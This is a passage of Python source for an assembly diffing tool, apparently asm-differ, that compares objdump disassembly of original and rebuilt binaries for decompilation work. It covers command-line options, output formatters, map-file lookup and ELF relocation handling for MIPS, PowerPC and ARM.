help="Sets the width of the left and right view column.",
)
parser.add_argument(
"--algorithm",
dest="algorithm",
default="levenshtein",
choices=["levenshtein", "difflib"],
help="""Diff algorithm to use. Levenshtein gives the minimum diff, while difflib
aims for long sections of equal opcodes. Defaults to %(default)s.""",
)
parser.add_argument(
"--max-size",
"--max-lines",
metavar="LINES",
dest="max_lines",
type=int,
default=1024,
help="The maximum length of the diff, in lines.",
)
parser.add_argument(
"--no-pager",
dest="no_pager",
action="store_true",
help="""Disable the pager; write output directly to stdout, then exit.
Incompatible with --watch.""",
)
parser.add_argument(
"--format",
choices=("color", "plain", "html", "json"),
default="color",
help="Output format, default is color. --format=html or json implies --no-pager.",
)
parser.add_argument(
"-U",
"--compress-matching",
metavar="N",
dest="compress_matching",
type=int,
help="""Compress streaks of matching lines, leaving N lines of context
around non-matching parts.""",
)
parser.add_argument(
"-V",
"--compress-sameinstr",
metavar="N",
dest="compress_sameinstr",
type=int,
help="""Compress streaks of lines with same instructions (but possibly
different regalloc), leaving N lines of context around other parts.""",
)
# Project-specific flags, e.g. different versions/make arguments.
add_custom_arguments_fn = getattr(diff_settings, "add_custom_arguments", None)
if add_custom_arguments_fn:
add_custom_arguments_fn(parser)
if argcomplete:
argcomplete.autocomplete(parser)
# ==== IMPORTS ====
# (We do imports late to optimize auto-complete performance.)
import abc
import ast
from collections import Counter, defaultdict
from dataclasses import asdict, dataclass, field, replace
import difflib
import enum
import html
import itertools
import json
import os
import queue
import re
import string
import struct
import subprocess
import threading
import time
import traceback
MISSING_PREREQUISITES = (
"Missing prerequisite python module {}. "
"Run `python3 -m pip install --user colorama watchdog python-Levenshtein cxxfilt` to install prerequisites (cxxfilt only needed with --source)."
)
try:
from colorama import Back, Fore, Style
import watchdog
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
# ==== CONFIG ====
@dataclass
class ProjectSettings:
arch_str: str
objdump_executable: str
build_command: List[str]
map_format: str
mw_build_dir: str
baseimg: Optional[str]
myimg: Optional[str]
mapfile: Optional[str]
source_directories: Optional[List[str]]
source_extensions: List[str]
show_line_numbers_default: bool
disassemble_all: bool
@dataclass
class Compress:
context: int
same_instr: bool
@dataclass
class Config:
arch: "ArchSettings"
# Build/objdump options
diff_obj: bool
objfile: str
make: bool
source_old_binutils: bool
diff_section: str
inlines: bool
max_function_size_lines: int
max_function_size_bytes: int
# Display options
formatter: "Formatter"
threeway: Optional[str]
base_shift: int
skip_lines: int
compress: Optional[Compress]
show_branches: bool
show_line_numbers: bool
show_source: bool
stop_jrra: bool
ignore_large_imms: bool
ignore_addr_diffs: bool
algorithm: str
# Score options
score_stack_differences = True
penalty_stackdiff = 1
penalty_regalloc = 5
penalty_reordering = 60
penalty_insertion = 100
penalty_deletion = 100
def create_project_settings(settings: Dict[str, Any]) -> ProjectSettings:
return ProjectSettings(
arch_str=settings.get("arch", "mips"),
baseimg=settings.get("baseimg"),
myimg=settings.get("myimg"),
mapfile=settings.get("mapfile"),
build_command=settings.get(
"make_command", ["make", *settings.get("makeflags", [])]
),
source_directories=settings.get("source_directories"),
source_extensions=settings.get(
"source_extensions", [".c", ".h", ".cpp", ".hpp", ".s"]
),
objdump_executable=get_objdump_executable(settings.get("objdump_executable")),
map_format=settings.get("map_format", "gnu"),
mw_build_dir=settings.get("mw_build_dir", "build/"),
show_line_numbers_default=settings.get("show_line_numbers_default", True),
disassemble_all=settings.get("disassemble_all", False)
)
def create_config(args: argparse.Namespace, project: ProjectSettings) -> Config:
arch = get_arch(project.arch_str)
formatter: Formatter
if args.format == "plain":
formatter = PlainFormatter(column_width=args.column_width)
elif args.format == "color":
formatter = AnsiFormatter(column_width=args.column_width)
elif args.format == "html":
formatter = HtmlFormatter()
elif args.format == "json":
formatter = JsonFormatter(arch_str=arch.name)
else:
raise ValueError(f"Unsupported --format: {args.format}")
compress = None
if args.compress_matching is not None:
compress = Compress(args.compress_matching, False)
if args.compress_sameinstr is not None:
if compress is not None:
raise ValueError(
"Cannot pass both --compress-matching and --compress-sameinstr"
)
compress = Compress(args.compress_sameinstr, True)
show_line_numbers = args.show_line_numbers
if show_line_numbers is None:
show_line_numbers = project.show_line_numbers_default
return Config(
arch=arch,
# Build/objdump options
diff_obj=args.diff_obj,
objfile=args.objfile,
make=args.make,
source_old_binutils=args.source_old_binutils,
diff_section=args.diff_section,
inlines=args.inlines,
max_function_size_lines=args.max_lines,
max_function_size_bytes=args.max_lines * 4,
# Display options
formatter=formatter,
threeway=args.threeway,
base_shift=eval_int(
args.base_shift, "Failed to parse --base-shift (-S) argument as an integer."
),
skip_lines=args.skip_lines,
compress=compress,
show_branches=args.show_branches,
show_line_numbers=show_line_numbers,
show_source=args.show_source or args.source_old_binutils,
stop_jrra=args.stop_jrra,
ignore_large_imms=args.ignore_large_imms,
ignore_addr_diffs=args.ignore_addr_diffs,
algorithm=args.algorithm,
)
def get_objdump_executable(objdump_executable: Optional[str]) -> str:
if objdump_executable is not None:
return objdump_executable
objdump_candidates = [
"mips-linux-gnu-objdump",
"mips64-elf-objdump",
"mips-elf-objdump",
]
for objdump_cand in objdump_candidates:
try:
subprocess.check_call(
[objdump_cand, "--version"],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
return objdump_cand
except subprocess.CalledProcessError:
pass
except FileNotFoundError:
pass
return fail(
f"Missing binutils; please ensure {' or '.join(objdump_candidates)} exists, or configure objdump_executable."
)
def get_arch(arch_str: str) -> "ArchSettings":
for settings in ARCH_SETTINGS:
if arch_str == settings.name:
return settings
raise ValueError(f"Unknown architecture: {arch_str}")
BUFFER_CMD: List[str] = ["tail", "-c", str(10 ** 9)]
# -S truncates long lines instead of wrapping them
# -R interprets color escape sequences
# -i ignores case when searching
# -c something about how the screen gets redrawn; I don't remember the purpose
# -#6 makes left/right arrow keys scroll by 6 characters
LESS_CMD: List[str] = ["less", "-SRic", "-#6"]
DEBOUNCE_DELAY: float = 0.1
# ==== FORMATTING ====
@enum.unique
class BasicFormat(enum.Enum):
NONE = enum.auto()
IMMEDIATE = enum.auto()
STACK = enum.auto()
REGISTER = enum.auto()
DELAY_SLOT = enum.auto()
DIFF_CHANGE = enum.auto()
DIFF_ADD = enum.auto()
DIFF_REMOVE = enum.auto()
SOURCE_FILENAME = enum.auto()
SOURCE_FUNCTION = enum.auto()
SOURCE_LINE_NUM = enum.auto()
SOURCE_OTHER = enum.auto()
@dataclass(frozen=True)
class RotationFormat:
group: str
index: int
key: str
Format = Union[BasicFormat, RotationFormat]
FormatFunction = Callable[[str], Format]
class Text:
segments: List[Tuple[str, Format]]
def __init__(self, line: str = "", f: Format = BasicFormat.NONE) -> None:
self.segments = [(line, f)] if line else []
def reformat(self, f: Format) -> "Text":
return Text(self.plain(), f)
def plain(self) -> str:
return "".join(s for s, f in self.segments)
def __repr__(self) -> str:
return f"<Text: {self.plain()!r}>"
def __bool__(self) -> bool:
return any(s for s, f in self.segments)
def __str__(self) -> str:
# Use Formatter.apply(...) instead
return NotImplemented
def __eq__(self, other: object) -> bool:
return NotImplemented
def __add__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
result = Text()
# If two adjacent segments have the same format, merge their lines
if (
self.segments
and other.segments
and self.segments[-1][1] == other.segments[0][1]
):
result.segments = (
self.segments[:-1]
+ [(self.segments[-1][0] + other.segments[0][0], self.segments[-1][1])]
+ other.segments[1:]
)
else:
result.segments = self.segments + other.segments
return result
def __radd__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
return other + self
def finditer(self, pat: Pattern[str]) -> Iterator[Match[str]]:
"""Replacement for `pat.finditer(text)` that operates on the inner text,
and returns the exact same matches as `Text.sub(pat, ...)`."""
for chunk, f in self.segments:
for match in pat.finditer(chunk):
yield match
def sub(self, pat: Pattern[str], sub_fn: Callable[[Match[str]], "Text"]) -> "Text":
result = Text()
for chunk, f in self.segments:
i = 0
for match in pat.finditer(chunk):
start, end = match.start(), match.end()
assert i <= start <= end <= len(chunk)
sub = sub_fn(match)
if i != start:
result.segments.append((chunk[i:start], f))
result.segments.extend(sub.segments)
i = end
if chunk[i:]:
result.segments.append((chunk[i:], f))
return result
def ljust(self, column_width: int) -> "Text":
length = sum(len(x) for x, _ in self.segments)
return self + " " * max(column_width - length, 0)
@dataclass
class TableMetadata:
headers: Tuple[Text, ...]
current_score: int
max_score: int
previous_score: Optional[int]
class Formatter(abc.ABC):
@abc.abstractmethod
def apply_format(self, chunk: str, f: Format) -> str:
"""Apply the formatting `f` to `chunk` and escape the contents."""
...
@abc.abstractmethod
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
"""Format a multi-column table with metadata"""
...
def apply(self, text: Text) -> str:
return "".join(self.apply_format(chunk, f) for chunk, f in text.segments)
@staticmethod
def outputline_texts(lines: Tuple["OutputLine", ...]) -> Tuple[Text, ...]:
return tuple([lines[0].base or Text()] + [line.fmt2 for line in lines[1:]])
@dataclass
class PlainFormatter(Formatter):
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
return chunk
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
rows = [meta.headers] + [self.outputline_texts(ls) for ls in lines]
return "\n".join(
"".join(self.apply(x.ljust(self.column_width)) for x in row) for row in rows
)
@dataclass
class AnsiFormatter(Formatter):
# Additional ansi escape codes not in colorama. See:
# https://en.wikipedia.org/wiki/ANSI_escape_code#SGR_(Select_Graphic_Rendition)_parameters
STYLE_UNDERLINE = "\x1b[4m"
STYLE_NO_UNDERLINE = "\x1b[24m"
STYLE_INVERT = "\x1b[7m"
BASIC_ANSI_CODES = {
BasicFormat.NONE: "",
BasicFormat.IMMEDIATE: Fore.LIGHTBLUE_EX,
BasicFormat.STACK: Fore.YELLOW,
BasicFormat.REGISTER: Fore.YELLOW,
BasicFormat.DELAY_SLOT: Fore.LIGHTBLACK_EX,
BasicFormat.DIFF_CHANGE: Fore.LIGHTBLUE_EX,
BasicFormat.DIFF_ADD: Fore.GREEN,
BasicFormat.DIFF_REMOVE: Fore.RED,
BasicFormat.SOURCE_FILENAME: Style.DIM + Style.BRIGHT,
BasicFormat.SOURCE_FUNCTION: Style.DIM + Style.BRIGHT + STYLE_UNDERLINE,
BasicFormat.SOURCE_LINE_NUM: Fore.LIGHTBLACK_EX,
BasicFormat.SOURCE_OTHER: Style.DIM,
}
BASIC_ANSI_CODES_UNDO = {
BasicFormat.NONE: "",
BasicFormat.SOURCE_FILENAME: Style.NORMAL,
BasicFormat.SOURCE_FUNCTION: Style.NORMAL + STYLE_NO_UNDERLINE,
BasicFormat.SOURCE_OTHER: Style.NORMAL,
}
ROTATION_ANSI_COLORS = [
Fore.MAGENTA,
Fore.CYAN,
Fore.GREEN,
Fore.RED,
Fore.LIGHTYELLOW_EX,
Fore.LIGHTMAGENTA_EX,
Fore.LIGHTCYAN_EX,
Fore.LIGHTGREEN_EX,
Fore.LIGHTBLACK_EX,
]
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
if f == BasicFormat.NONE:
return chunk
undo_ansi_code = Fore.RESET
if isinstance(f, BasicFormat):
ansi_code = self.BASIC_ANSI_CODES[f]
undo_ansi_code = self.BASIC_ANSI_CODES_UNDO.get(f, undo_ansi_code)
elif isinstance(f, RotationFormat):
ansi_code = self.ROTATION_ANSI_COLORS[
f.index % len(self.ROTATION_ANSI_COLORS)
]
else:
static_assert_unreachable(f)
return f"{ansi_code}{chunk}{undo_ansi_code}"
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
rows = [(meta.headers, False)] + [
(self.outputline_texts(line), line[1].is_data_ref) for line in lines
]
return "\n".join(
"".join(
(self.STYLE_INVERT if is_data_ref else "")
+ self.apply(x.ljust(self.column_width))
for x in row
)
for (row, is_data_ref) in rows
)
@dataclass
class HtmlFormatter(Formatter):
rotation_formats: int = 9
def apply_format(self, chunk: str, f: Format) -> str:
chunk = html.escape(chunk)
if f == BasicFormat.NONE:
return chunk
if isinstance(f, BasicFormat):
class_name = f.name.lower().replace("_", "-")
data_attr = ""
elif isinstance(f, RotationFormat):
class_name = f"rotation-{f.index % self.rotation_formats}"
rotation_key = html.escape(f"{f.group};{f.key}", quote=True)
data_attr = f'data-rotation="{rotation_key}"'
else:
static_assert_unreachable(f)
return f"<span class='{class_name}' {data_attr}>{chunk}</span>"
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
def table_row(line: Tuple[Text, ...], is_data_ref: bool, cell_el: str) -> str:
tr_attrs = " class='data-ref'" if is_data_ref else ""
output_row = f" <tr{tr_attrs}>"
for cell in line:
cell_html = self.apply(cell)
output_row += f"<{cell_el}>{cell_html}</{cell_el}>"
output_row += "</tr>\n"
return output_row
output = "<table class='diff'>\n"
output += " <thead>\n"
output += table_row(meta.headers, False, "th")
output += " </thead>\n"
output += " <tbody>\n"
output += "".join(
table_row(self.outputline_texts(line), line[1].is_data_ref, "td")
for line in lines
)
output += " </tbody>\n"
output += "</table>\n"
return output
@dataclass
class JsonFormatter(Formatter):
arch_str: str
def apply_format(self, chunk: str, f: Format) -> str:
# This method is unused by this formatter
return NotImplemented
def table(self, meta: TableMetadata, rows: List[Tuple["OutputLine", ...]]) -> str:
def serialize_format(s: str, f: Format) -> Dict[str, Any]:
if f == BasicFormat.NONE:
return {"text": s}
elif isinstance(f, BasicFormat):
return {"text": s, "format": f.name.lower()}
elif isinstance(f, RotationFormat):
attrs = asdict(f)
attrs.update(
{
"text": s,
"format": "rotation",
}
)
return attrs
else:
static_assert_unreachable(f)
def serialize(text: Optional[Text]) -> List[Dict[str, Any]]:
if text is None:
return []
return [serialize_format(s, f) for s, f in text.segments]
is_threeway = len(meta.headers) == 3
output: Dict[str, Any] = {}
output["arch_str"] = self.arch_str
output["header"] = {
name: serialize(h)
for h, name in zip(meta.headers, ("base", "current", "previous"))
}
output["current_score"] = meta.current_score
output["max_score"] = meta.max_score
if meta.previous_score is not None:
output["previous_score"] = meta.previous_score
output_rows: List[Dict[str, Any]] = []
for row in rows:
output_row: Dict[str, Any] = {}
output_row["key"] = row[0].key2
output_row["is_data_ref"] = row[1].is_data_ref
iters = [
("base", row[0].base, row[0].line1),
("current", row[1].fmt2, row[1].line2),
]
if is_threeway:
iters.append(("previous", row[2].fmt2, row[2].line2))
if all(line is None for _, _, line in iters):
# Skip rows that were only for displaying source code
continue
for column_name, text, line in iters:
column: Dict[str, Any] = {}
column["text"] = serialize(text)
if line:
if line.line_num is not None:
column["line"] = line.line_num
if line.branch_target is not None:
column["branch"] = line.branch_target
if line.source_lines:
column["src"] = line.source_lines
if line.comment is not None:
column["src_comment"] = line.comment
if line.source_line_num is not None:
column["src_line"] = line.source_line_num
if line or column["text"]:
output_row[column_name] = column
output_rows.append(output_row)
output["rows"] = output_rows
return json.dumps(output)
def format_fields(
pat: Pattern[str],
out1: Text,
out2: Text,
color1: FormatFunction,
color2: Optional[FormatFunction] = None,
) -> Tuple[Text, Text]:
diffs = [
of.group() != nf.group()
for (of, nf) in zip(out1.finditer(pat), out2.finditer(pat))
]
it = iter(diffs)
def maybe_color(color: FormatFunction, s: str) -> Text:
return Text(s, color(s)) if next(it, False) else Text(s)
out1 = out1.sub(pat, lambda m: maybe_color(color1, m.group()))
it = iter(diffs)
out2 = out2.sub(pat, lambda m: maybe_color(color2 or color1, m.group()))
return out1, out2
def symbol_formatter(group: str, base_index: int) -> FormatFunction:
symbol_formats: Dict[str, Format] = {}
def symbol_format(s: str) -> Format:
# TODO: it would be nice to use a unique Format for each symbol, so we could
# add extra UI elements in the HTML version
f = symbol_formats.get(s)
if f is None:
index = len(symbol_formats) + base_index
f = RotationFormat(key=s, index=index, group=group)
symbol_formats[s] = f
return f
return symbol_format
# ==== LOGIC ====
ObjdumpCommand = Tuple[List[str], str, Optional[str]]
def maybe_eval_int(expr: str) -> Optional[int]:
try:
ret = ast.literal_eval(expr)
if not isinstance(ret, int):
raise Exception("not an integer")
return ret
except Exception:
return None
def eval_int(expr: str, emsg: str) -> int:
ret = maybe_eval_int(expr)
if ret is None:
fail(emsg)
return ret
def eval_line_num(expr: str) -> Optional[int]:
expr = expr.strip().replace(":", "")
if expr == "":
return None
return int(expr, 16)
def run_make(target: str, project: ProjectSettings) -> None:
subprocess.check_call(project.build_command + [target])
def run_make_capture_output(
target: str, project: ProjectSettings
) -> "subprocess.CompletedProcess[bytes]":
return subprocess.run(
project.build_command + [target],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
def restrict_to_function(dump: str, fn_name: str) -> str:
try:
ind = dump.index("\n", dump.index(f"<{fn_name}>:"))
return dump[ind + 1 :]
except ValueError:
return ""
def serialize_data_references(references: List[Tuple[int, int, str]]) -> str:
return "".join(
f"DATAREF {text_offset} {from_offset} {from_section}\n"
for (text_offset, from_offset, from_section) in references
)
def maybe_get_objdump_source_flags(config: Config) -> List[str]:
flags = []
if config.show_line_numbers or config.show_source:
flags.append("--line-numbers")
if config.show_source:
flags.append("--source")
if not config.source_old_binutils:
flags.append("--source-comment=│ ")
if config.inlines:
flags.append("--inlines")
return flags
def run_objdump(cmd: ObjdumpCommand, config: Config, project: ProjectSettings) -> str:
flags, target, restrict = cmd
try:
out = subprocess.run(
[project.objdump_executable] + config.arch.arch_flags + flags + [target],
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
).stdout
except subprocess.CalledProcessError as e:
print(e.stdout)
print(e.stderr)
if "unrecognized option '--source-comment" in e.stderr:
fail("** Try using --source-old-binutils instead of --source **")
raise e
obj_data: Optional[bytes] = None
if config.diff_obj:
with open(target, "rb") as f:
obj_data = f.read()
return preprocess_objdump_out(restrict, obj_data, out, config)
def preprocess_objdump_out(
restrict: Optional[str], obj_data: Optional[bytes], objdump_out: str, config: Config
) -> str:
"""
Preprocess the output of objdump into a format that `process()` expects.
This format is suitable for saving to disk with `--write-asm`.
- Optionally filter the output to a single function (`restrict`)
- Otherwise, strip objdump header (7 lines)
- Prepend .data references ("DATAREF" lines) when working with object files
"""
out = objdump_out
if restrict is not None:
out = restrict_to_function(out, restrict)
else:
for i in range(7):
out = out[out.find("\n") + 1 :]
out = out.rstrip("\n")
if obj_data:
out = serialize_data_references(parse_elf_data_references(obj_data, config)) + out
return out
def search_map_file(
fn_name: str, project: ProjectSettings, config: Config
) -> Tuple[Optional[str], Optional[int]]:
if not project.mapfile:
fail(f"No map file configured; cannot find function {fn_name}.")
try:
with open(project.mapfile) as f:
contents = f.read()
except Exception:
fail(f"Failed to open map file {project.mapfile} for reading.")
if project.map_format == "gnu":
lines = contents.split("\n")
try:
cur_objfile = None
ram_to_rom = None
cands = []
last_line = ""
for line in lines:
if line.startswith(" " + config.diff_section):
cur_objfile = line.split()[3]
if "load address" in line:
tokens = last_line.split() + line.split()
ram = int(tokens[1], 0)
rom = int(tokens[5], 0)
ram_to_rom = rom - ram
if line.endswith(" " + fn_name):
ram = int(line.split()[0], 0)
if cur_objfile is not None and ram_to_rom is not None:
cands.append((cur_objfile, ram + ram_to_rom))
last_line = line
except Exception as e:
traceback.print_exc()
fail(f"Internal error while parsing map file")
if len(cands) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(cands) == 1:
return cands[0]
elif project.map_format == "mw":
section_pattern = re.escape(config.diff_section)
find = re.findall(
re.compile(
# ram elf rom
r" \S+ \S+ (\S+) (\S+) . "
+ fn_name
# object name
+ r"(?: \(entry of " + section_pattern + r"\))? \t(\S+)"
),
contents,
)
if len(find) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(find) == 1:
rom = int(find[0][1], 16)
objname = find[0][2]
# The metrowerks linker map format does not contain the full object path,
# so we must complete it manually.
objfiles = [
os.path.join(dirpath, f)
for dirpath, _, filenames in os.walk(project.mw_build_dir)
for f in filenames
if f == objname
]
if len(objfiles) > 1:
all_objects = "\n".join(objfiles)
fail(
f"Found multiple objects of the same name {objname} in {project.mw_build_dir}, "
f"cannot determine which to diff against: \n{all_objects}"
)
if len(objfiles) == 1:
objfile = objfiles[0]
# TODO Currently the ram-rom conversion only works for diffing ELF
# executables, but it would likely be more convenient to diff DOLs.
# At this time it is recommended to always use -o when running the diff
# script as this mode does not make use of the ram-rom conversion.
return objfile, rom
else:
fail(f"Linker map format {project.map_format} unrecognised.")
return None, None
def parse_elf_data_references(data: bytes, config: Config) -> List[Tuple[int, int, str]]:
e_ident = data[:16]
if e_ident[:4] != b"\x7FELF":
return []
SHT_SYMTAB = 2
SHT_REL = 9
SHT_RELA = 4
is_32bit = e_ident[4] == 1
is_little_endian = e_ident[5] == 1
str_end = "<" if is_little_endian else ">"
str_off = "I" if is_32bit else "Q"
def read(spec: str, offset: int) -> Tuple[int, ...]:
spec = spec.replace("P", str_off)
size = struct.calcsize(spec)
return struct.unpack(str_end + spec, data[offset : offset + size])
(
e_type,
e_machine,
e_version,
e_entry,
e_phoff,
e_shoff,
e_flags,
e_ehsize,
e_phentsize,
e_phnum,
e_shentsize,
e_shnum,
e_shstrndx,
) = read("HHIPPPIHHHHHH", 16)
if e_type != 1: # relocatable
return []
assert e_shoff != 0
assert e_shnum != 0 # don't support > 0xFF00 sections
assert e_shstrndx != 0
@dataclass
class Section:
sh_name: int
sh_type: int
sh_flags: int
sh_addr: int
sh_offset: int
sh_size: int
sh_link: int
sh_info: int
sh_addralign: int
sh_entsize: int
sections = [
Section(*read("IIPPPPIIPP", e_shoff + i * e_shentsize)) for i in range(e_shnum)
]
shstr = sections[e_shstrndx]
sec_name_offs = [shstr.sh_offset + s.sh_name for s in sections]
sec_names = [data[offset : data.index(b"\0", offset)] for offset in sec_name_offs]
symtab_sections = [i for i in range(e_shnum) if sections[i].sh_type == SHT_SYMTAB]
assert len(symtab_sections) == 1
symtab = sections[symtab_sections[0]]
section_name = config.diff_section.encode("utf-8")
text_sections = [i for i in range(e_shnum) if sec_names[i] == section_name and sections[i].sh_size != 0]
if len(text_sections) != 1:
return []
text_section = text_sections[0]
ret: List[Tuple[int, int, str]] = []
for s in sections:
if s.sh_type == SHT_REL or s.sh_type == SHT_RELA:
if s.sh_info == text_section:
# Skip section_name -> section_name references
continue
sec_name = sec_names[s.sh_info].decode("latin1")
if sec_name == ".mwcats.text":
# Skip Metrowerks CATS Utility section
continue
sec_base = sections[s.sh_info].sh_offset
for i in range(0, s.sh_size, s.sh_entsize):
if s.sh_type == SHT_REL:
r_offset, r_info = read("PP", s.sh_offset + i)
else:
r_offset, r_info, r_addend = read("PPP", s.sh_offset + i)
if is_32bit:
r_sym = r_info >> 8
r_type = r_info & 0xFF
sym_offset = symtab.sh_offset + symtab.sh_entsize * r_sym
st_name, st_value, st_size, st_info, st_other, st_shndx = read(
"IIIBBH", sym_offset
)
else:
r_sym = r_info >> 32
r_type = r_info & 0xFFFFFFFF
sym_offset = symtab.sh_offset + symtab.sh_entsize * r_sym
st_name, st_info, st_other, st_shndx, st_value, st_size = read(
"IBBHQQ", sym_offset
)
if st_shndx == text_section:
if s.sh_type == SHT_REL:
if e_machine == 8 and r_type == 2: # R_MIPS_32
(r_addend,) = read("I", sec_base + r_offset)
else:
continue
text_offset = (st_value + r_addend) & 0xFFFFFFFF
ret.append((text_offset, r_offset, sec_name))
return ret
def dump_elf(
start: str,
end: Optional[str],
diff_elf_symbol: str,
config: Config,
project: ProjectSettings,
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.base_shift:
fail("--base-shift not compatible with -e")
start_addr = eval_int(start, "Start address must be an integer expression.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
flags1 = [
f"--start-address={start_addr}",
f"--stop-address={end_addr}",
]
if project.disassemble_all:
disassemble_flag = "-D"
else:
disassemble_flag = "-d"
flags2 = [
f"--disassemble={diff_elf_symbol}",
]
objdump_flags = [disassemble_flag, "-rz", "-j", config.diff_section]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(
objdump_flags + flags2 + maybe_get_objdump_source_flags(config),
project.myimg,
None,
),
)
def dump_objfile(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if config.base_shift:
fail("--base-shift not compatible with -o")
if end is not None:
fail("end address not supported together with -o")
if start.startswith("0"):
fail("numerical start address not supported with -o; pass a function name")
objfile = config.objfile
if not objfile:
objfile, _ = search_map_file(start, project, config)
if not objfile:
fail("Not able to find .o file for function.")
if config.make:
run_make(objfile, project)
if not os.path.isfile(objfile):
fail(f"Not able to find .o file for function: {objfile} is not a file.")
refobjfile = "expected/" + objfile
if not os.path.isfile(refobjfile):
fail(f'Please ensure an OK .o file exists at "{refobjfile}".')
if project.disassemble_all:
disassemble_flag = "-D"
else:
disassemble_flag = "-d"
objdump_flags = [disassemble_flag, "-rz", "-j", config.diff_section]
return (
objfile,
(objdump_flags, refobjfile, start),
(objdump_flags + maybe_get_objdump_source_flags(config), objfile, start),
)
def dump_binary(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.make:
run_make(project.myimg, project)
start_addr = maybe_eval_int(start)
if start_addr is None:
_, start_addr = search_map_file(start, project, config)
if start_addr is None:
fail("Not able to find function in map file.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
objdump_flags = ["-Dz", "-bbinary"] + ["-EB" if config.arch.big_endian else "-EL"]
flags1 = [
f"--start-address={start_addr + config.base_shift}",
f"--stop-address={end_addr + config.base_shift}",
]
flags2 = [f"--start-address={start_addr}", f"--stop-address={end_addr}"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(objdump_flags + flags2, project.myimg, None),
)
# Example: "ldr r4, [pc, #56] ; (4c <AddCoins+0x4c>)"
ARM32_LOAD_POOL_PATTERN = r"(ldr\s+r([0-9]|1[0-3]),\s+\[pc,.*;\s*)(\([a-fA-F0-9]+.*\))"
# The base class is a no-op.
class AsmProcessor:
def __init__(self, config: Config) -> None:
self.config = config
def process_reloc(self, row: str, prev: str) -> str:
return prev
def normalize(self, mnemonic: str, row: str) -> str:
"""This should be called exactly once for each line."""
arch = self.config.arch
row = self._normalize_arch_specific(mnemonic, row)
if self.config.ignore_large_imms and mnemonic not in arch.branch_instructions:
row = re.sub(self.config.arch.re_large_imm, "<imm>", row)
return row
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
return row
def post_process(self, lines: List["Line"]) -> None:
return
class AsmProcessorMIPS(AsmProcessor):
def process_reloc(self, row: str, prev: str) -> str:
arch = self.config.arch
if "R_MIPS_NONE" in row or "R_MIPS_JALR" in row:
# GNU as emits no-op relocations immediately after real ones when
# assembling with -mabi=64. Return without trying to parse 'imm' as an
# integer.
return prev
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if imm != "0":
# MIPS uses relocations with addends embedded in the code as immediates.
# If there is an immediate, show it as part of the relocation. Ideally
# we'd show this addend in both %lo/%hi, but annoyingly objdump's output
# doesn't include enough information to pair up %lo's and %hi's...
# TODO: handle unambiguous cases where all addends for a symbol are the
# same, or show "+???".
mnemonic = prev.split()[0]
if (
mnemonic in arch.instructions_with_address_immediates
and not imm.startswith("0x")
):
imm = "0x" + imm
repl += "+" + imm if int(imm, 0) > 0 else imm
if "R_MIPS_LO16" in row:
repl = f"%lo({repl})"
elif "R_MIPS_HI16" in row:
# Ideally we'd pair up R_MIPS_LO16 and R_MIPS_HI16 to generate a
# correct addend for each, but objdump doesn't give us the order of
# the relocations, so we can't find the right LO16. :(
repl = f"%hi({repl})"
elif "R_MIPS_26" in row:
# Function calls
pass
elif "R_MIPS_PC16" in row:
# Branch to glabel. This gives confusing output, but there's not much
# we can do here.
pass
elif "R_MIPS_GPREL16" in row:
repl = f"%gp_rel({repl})"
elif "R_MIPS_GOT16" in row:
repl = f"%got({repl})"
elif "R_MIPS_CALL16" in row:
repl = f"%call16({repl})"
else:
assert False, f"unknown relocation type '{row}' for line '{prev}'"
return before + repl + after
class AsmProcessorPPC(AsmProcessor):
def process_reloc(self, row: str, prev: str) -> str:
arch = self.config.arch
assert any(
r in row for r in ["R_PPC_REL24", "R_PPC_ADDR16", "R_PPC_EMB_SDA21"]
), f"unknown relocation type '{row}' for line '{prev}'"
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if "R_PPC_REL24" in row:
# function calls
pass
elif "R_PPC_ADDR16_HI" in row:
# absolute hi of addr
repl = f"{repl}@h"
elif "R_PPC_ADDR16_HA" in row:
# adjusted hi of addr
repl = f"{repl}@ha"
elif "R_PPC_ADDR16_LO" in row:
# lo of addr
repl = f"{repl}@l"
elif "R_PPC_ADDR16" in row:
# 16-bit absolute addr
if "+0x7" in repl:
# remove the very large addends as they are an artifact of (label-_SDA(2)_BASE_)
# computations and are unimportant in a diff setting.
if int(repl.split("+")[1], 16) > 0x70000000:
repl = repl.split("+")[0]
elif "R_PPC_EMB_SDA21" in row:
# small data area
pass
return before + repl + after
class AsmProcessorARM32(AsmProcessor):
def process_reloc(self, row: str, prev: str) -> str:
arch = self.config.arch
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
return before + repl + after
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_bl(mnemonic, row)
row = self._normalize_data_pool(row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_address(row)
